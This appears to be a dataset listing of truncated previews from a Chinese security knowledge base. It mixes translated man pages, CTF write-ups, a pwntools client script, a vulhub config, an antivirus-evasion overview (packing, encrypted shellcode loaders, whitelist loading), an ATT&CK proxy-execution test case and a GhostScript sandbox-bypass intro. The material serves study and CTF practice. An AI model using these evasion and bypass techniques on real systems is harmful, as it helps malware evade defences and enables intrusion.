.TH SPLIT "1" "December 1999" "GNU textutils 2.0a" FSF .SH NAME split \- 分割文件 .SH "总览 (SYNOPSIS)" .B ../src/split [\fIOPTION\fR] [\fIINPUT \fR[\fIPREFIX\fR]] .SH "描述 (DESCRIPTION)" .\" Add any additional description here .PP 把 输入文件 INPUT 按 固定大小 的 文件片 PREFIXaa, PREFIXab, ... 输出; 缺省的 PREFIX 是 `x'. 如果 没有 指定 INPUT, 或 INPU...
sec-knowleage
# We reverse the binary to obtain the parameters, then perform RSA: from Crypto.PublicKey import RSA from Crypto.Util.number import long_to_bytes data = """.rodata:0000000000001100 db 30h ; DATA XREF: main+3AE↑o .rodata:0000000000001101 db 82h .rodata:0000000000001102 ...
sec-knowleage
# pastebin-1 Web # Solution We receive the source code for a pastebin-like service: ```javascript const http = require('http') const pageNew = `<!doctype html> <h3>make a new paste</h3> <form> <textarea name="paste"></textarea> <br> <input type="submit"> </form> <div id="error"></div> <script>error.innerHTML=deco...
sec-knowleage
version: '2' services: web: image: vulhub/mini_httpd:1.29 command: mini_httpd -p 8080 -u www-data -h 0.0.0.0 -D -l /dev/stdout -v -T utf-8 ports: - "8080:8080"
sec-knowleage
.\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\"******************************************************************* .\" .\" This file was generated with po4a. Translate the source file. .\" .\"******************************************************************* .TH UNIQ 1 2022年9月 "GNU coreutils 9.1...
sec-knowleage
# Born2Root: 2 > https://download.vulnhub.com/born2root/Born2rootv2.ova 靶场IP:`192.168.32.18` 扫描对外端口服务 ``` ┌──(root㉿kali)-[~] └─# nmap -sV -p1-65535 192.168.32.18 Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-13 00:09 EDT Nmap scan report for 192.168.32.18 Host is up (0.00012s latency). Not shown: 65531 closed tcp ...
sec-knowleage
# Spring --- ## 免责声明 `本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.` --- > 官网 : https://spring.io/ **指纹** - `X-Application-Context:` **相关文章** - [spring框架的一些测试思路](https://www.cnblogs.com/cwkiller/p/12040535.html) - [spring-boot漏洞复现](https://mp.weixin.qq.com/s/hGm0wBON_mn9wh0-DxM19A) - [JavaWeb中常见的信息泄漏—Hystrix面板](ht...
sec-knowleage
# 0x00 简介 AV查杀有几种方式:文件,内存,流量,行为。 以下文章基本都是做的比较简单的免杀,同时CS包含的其他模块可能被杀,我们有几种简单的思路,就不涉及什么定位特征码来做了。 1. 加壳 2. 多平台多语言生成shellcode 3. 加密shellcode 加载 4. 插入正常文件 5. 白名单加载 # 0x01 框架 这几款是比较热门的,但是感觉效果一般了。 1. Veil https://github.com/Veil-Framework/Veil 2. Phantom-Evasion https://github.com/oddcod3/Phantom-Evasion 3. shellter https://...
sec-knowleage
.TH cron 8 .SH NAME .B cron \- 定期执行指定命令的守护程序 (Vixie Cron) .SH 总览 .B cron .SH 描述 Cron 应该由 /etc/rc 或者 /etc/rc.local 启动(译注:有很多发行版与此不同的,如 RedHat6.x 使用 /etc/rc.d/init.d/crond )。系统会立即返回提示符状态,因此没有必要后缀 '&' 来启动。 Cron 在目录 /var/spool/cron 下搜索以 /etc/passwd 中账户名命名的 crontab 文件,将找到的文件内容加载到内存中。 Cron 还搜索 /etc/crontab 和目录 /etc/cron.d/ 下...
sec-knowleage
# T1127-win-受信任的开发者实用程序代理执行(白名单) ## 来自ATT&CK的描述 攻击者可能会利用受信任的开发人员使用的程序来代理执行恶意载荷。有许多用于软件开发相关任务的实用程序可用于执行各种形式的代码,以协助开发、调试和逆向工程。这些实用程序通常可能使用合法证书进行签名,允许它们在系统上执行并通过有效绕过应用程序控制解决方案的受信任进程代理执行恶意代码。 ## 测试案例 ASP.NET 编译工具 Aspnet_compiler.exe 路径: ``` - c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe - c:\Windows\Mi...
sec-knowleage
**Authors**: < [nixawk](https://github.com/nixawk) > ---- # How to gather whois information ? - Whois Searches - Querying a Whois Database Information in regard to whois gathering and how attackers use the information use the information that is displayed in whois records against unsuspecting organizational members, le...
sec-knowleage
##Twitter search (Recon, 200p) So you reached Delhi and now the noise in your head is not allowing you to think rationally. The Nosise in your head has origin its Origin in your Stomach. And this is a big hunger. You can finish one or probably 2 Tandoori Chicken. So where can you get the best Tandoori Chicken in Delh...
sec-knowleage
# 65. 不用加减乘除做加法 ## 题目链接 [NowCoder](https://www.nowcoder.com/practice/59ac416b4b944300b617d4f7f111b215?tpId=13&tqId=11201&tPage=1&rp=1&ru=/ta/coding-interviews&qru=/ta/coding-interviews/question-ranking&from=cyc_github) ## 题目描述 写一个函数,求两个整数之和,要求不得使用 +、-、\*、/ 四则运算符号。 ## 解题思路 a ^ b 表示没有考虑进位的情况下两数的和,(a & b) \<\< 1 就是进位。 递归会...
sec-knowleage
# Postbook - FLAG5 ## 0x00 Cookie user cookie ``` id: "c81e728d9d4c2f636f067f89cc14862c" ``` Check at [cmd5.com][1]. It is just md5 value of 2. ![](./imgs/cookie.jpg) ## 0x01 Admin Cookie md5(1) ``` id: "c4ca4238a0b923820dcc509a6f75849b" ``` ## 0x02 FLAG Successfully login as admin. ![](./imgs/flag.jpg) [1]: https://ww...
sec-knowleage
# Tapping Cryptography, 200 points ## Description: > Theres tapping coming in from the wires. ## Solution: Let's connect to the service: ```console root@kali:/media/sf_CTFs/pico/Tapping# nc 2019shell1.picoctf.com 37920 .--. .. -.-. --- -.-. - ..-. { -- ----- .-. ... ...-- -.-. ----- -.. ...-- .---- ... ..-. ..- -. ......
sec-knowleage
from pwn import * import hashlib import matplotlib.pyplot as plt sys.setrecursionlimit(100000) context.log_level="DEBUG" host="amazeing.hackable.software" r=remote(host,1337) key="" def move(m): x=m[0] y=m[1] if y==-1: port=31337 if y==1: port=31339 if x==-1: port=31336 ...
sec-knowleage
# Writeup 32c3 CTF 2015 Uczestniczyliśmy (cr019283, c7f.m0d3, mnmd21891, msm, Rev, other019, nazywam i Shalom) w 32c3 CTF 2015, i znowu spróbujemy opisać zadania z którymi walczyliśmy (a przynajmniej te, które pokonaliśmy). ### Spis treści: * [Forth (Pwn) 150](forth_pwn_150) * [Teufel (Pwn) 200](teufel_pwn_200) * [HD44...
sec-knowleage
.TH "IPCCLEAN" "1" "2003-11-02" "Application" "PostgreSQL Server Applications" .SH NAME ipcclean \- 从退出的PostgreSQL服务器中删除共享内存和信号灯 .SH SYNOPSIS .sp \fBipcclean\fR .SH "DESCRIPTION 描述" .PP \fBipcclean\fR 删除当前用户拥有的所有共享内存段和信号灯集。 它的目地是在 PostgreSQL 服务器 (\fBpostmaster\fR(1))崩溃之后进行清理。 请注意的是立 即重起服务器也会清理共享内存和信号灯,所以这条命令实际上用处不大。 .P...
sec-knowleage
# pointy Binary Exploitation, 350 points ## Description: > Exploit the function pointers in this program. ```c #include <stdlib.h> #include <stdio.h> #include <stdint.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #define FLAG_BUFFER 128 #define NAME_SIZE 128 #define MAX_ADDRESSES 1000 int ADRESSES_TAKEN...
sec-knowleage
# GhostScript 沙箱绕过(命令执行)漏洞(CVE-2019-6116) 2019年1月23日晚,Artifex官方在ghostscriptf的master分支上提交合并了多达6处的修复。旨在修复 CVE-2019-6116 漏洞,该漏洞由 Google 安全研究员 Tavis 于2018年12月3日提交。该漏洞可以直接绕过 ghostscript 的安全沙箱,导致攻击者可以执行任意命令/读取任意文件。 GhostScript 被许多图片处理库所使用,如 ImageMagick、Python PIL 等,默认情况下这些库会根据图片的内容将其分发给不同的处理方法,其中就包括 GhostScript。 参考链接: - ...
sec-knowleage
# Weird File Category: Binary Exploitation, 50 points ## Description A Python file was attached. ```python #!/usr/bin/python2 -u import random cities = open("./city_names.txt").readlines() city = random.choice(cities).rstrip() year = 2018 print("What's your favorite number?") res = None while not res: try: ...
sec-knowleage
# Confidence CTF Teaser 2017 Team: rev, nazywam, akrasuski1, msm, c7f.m0d3, shalom ## Table of contents * [Public Key Infrastructure (crypto)](pki)
sec-knowleage
# Fridge TODO List PWN ## Description: > One of the main selling points of smart fridge 2000 over the smart fridge 1999 is that it comes with a TODO list network service. We heard that Wintermuted uses this list as a password storage, maybe you can find a bug to leak their notes? Luckily we found the source code of the...
sec-knowleage
.\" Copyright (c) 1993 Michael Haardt (michael@moria.de), .\" Fri Apr 2 11:32:09 MET DST 1993 .\" and Andries Brouwer (aeb@cwi.nl), Fri Feb 14 21:47:50 1997. .\" .\" This is free documentation; you can redistribute it and/or .\" modify it under the terms of the GNU General Public License as .\" published by the Free So...
sec-knowleage